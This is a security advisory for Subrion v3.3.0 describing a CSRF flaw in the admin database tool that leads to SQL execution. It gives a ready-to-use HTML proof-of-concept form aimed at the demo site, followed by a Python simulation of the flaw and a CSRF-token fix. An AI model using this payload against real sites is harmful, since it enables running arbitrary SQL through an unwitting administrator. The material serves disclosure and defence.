# Affected software: Subrion
# Type of vulnerability: CSRF to SQL injection
# URL: http://demo.subrion.org
# Discovered by: Provensec
# Website: http://www.provensec.com
# Version: v3.3.0
# Proof of concept

The admin database tool at /admin/database/ executes the SQL supplied in the
POST parameter `query` (when `exec_query` is set) without any CSRF token, so
a page the logged-in administrator visits can submit that form on their
behalf. A cross-site request therefore runs attacker-chosen SQL against the
Subrion database: a CSRF chained into SQL injection.

Vulnerable parameter: query

Preconditions: the victim must be authenticated as a Subrion administrator
in the same browser when the attacker's page submits the form, and the table
prefix used in the PoC (sbr301_ on the demo site) must match the target
installation.

PoC:

<html>
  <body>
    <!-- Submitting this form while logged in as a Subrion admin runs the
         SQL in "query" on http://demo.subrion.org with the victim's session. -->
    <form action="http://demo.subrion.org/admin/database/" method="POST">
      <input type="hidden" name="query"
             value="SELECT&#32;&#42;&#32;FROM&#32;&#32;&#96;sbr301&#95;albums&#96;&#32;&#32;&#96;id&#96;&#32;" />
      <input type="hidden" name="table" value="sbr301&#95;albums" />
      <input type="hidden" name="field" value="id" />
      <input type="hidden" name="exec&#95;query" value="Go" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
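The following is an added illustration, not Subrion's code: a simulation of the admin database form handler as the advisory describes it (session cookie checked, nothing else) next to a hardened version that requires a per-session CSRF token. The PoC form above is replayed against both with an in-memory SQLite stand-in for the database; the table, the handler names, and the token field name `csrf_token` are assumptions made for the example.

```python
import hmac
import secrets
import sqlite3

# Constructed stand-in for the Subrion database: one table with the name and
# column the PoC targets (sbr301_ is the demo site's prefix).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE `sbr301_albums` (`id` INTEGER PRIMARY KEY, `title` TEXT)")
    con.executemany("INSERT INTO `sbr301_albums` VALUES (?, ?)",
                    [(1, "first"), (2, "second"), (3, "third")])
    return con

# The PoC form fields as the victim's browser would POST them (HTML entities
# from the advisory decoded). The victim's browser attaches the admin cookie,
# so the server sees the same session as a legitimate request.
POC_FORM = {
    "query": "SELECT * FROM  `sbr301_albums`  `id` ",
    "table": "sbr301_albums",
    "field": "id",
    "exec_query": "Go",
}

def run_query(con, query):
    # Models the tool's purpose: execute whatever SQL the admin submits.
    return con.execute(query).fetchall()

def database_form_vulnerable(con, session, form):
    # As reported: only the session is checked, so a cross-site POST that
    # rides on the admin's cookie is indistinguishable from a real one.
    if not session.get("is_admin"):
        return ("denied", None)
    if form.get("exec_query") != "Go":
        return ("noop", None)
    return ("executed", run_query(con, form["query"]))

def issue_csrf_token(session):
    # Hypothetical fix: mint a random token when the form page is rendered,
    # store it server-side in the session and embed it in the form.
    session["csrf_token"] = secrets.token_hex(16)
    return session["csrf_token"]

def database_form_fixed(con, session, form):
    if not session.get("is_admin"):
        return ("denied", None)
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    # An attacker's page cannot read the token out of the admin's session or
    # form, so a forged POST arrives without it (or with a guess). Constant-time
    # comparison avoids leaking the token through timing.
    if not expected or not hmac.compare_digest(expected, supplied):
        return ("csrf_rejected", None)
    if form.get("exec_query") != "Go":
        return ("noop", None)
    return ("executed", run_query(con, form["query"]))

def demo():
    """Replay the PoC against both handlers; returns the three outcomes."""
    con = make_db()
    admin_session = {"is_admin": True}          # victim is logged in as admin
    vuln_status, _ = database_form_vulnerable(con, admin_session, POC_FORM)
    issue_csrf_token(admin_session)              # admin loaded the real form
    forged_status, _ = database_form_fixed(con, admin_session, POC_FORM)
    legit_form = dict(POC_FORM, csrf_token=admin_session["csrf_token"])
    legit_status, _ = database_form_fixed(con, admin_session, legit_form)
    return vuln_status, forged_status, legit_status

if __name__ == "__main__":
    print(demo())
```

The token check is the minimum that closes the reported hole; a practitioner would pair it with a SameSite attribute on the admin session cookie and an Origin/Referer check on state-changing admin routes as defence in depth, and would keep the SQL console itself behind a separate confirmation step.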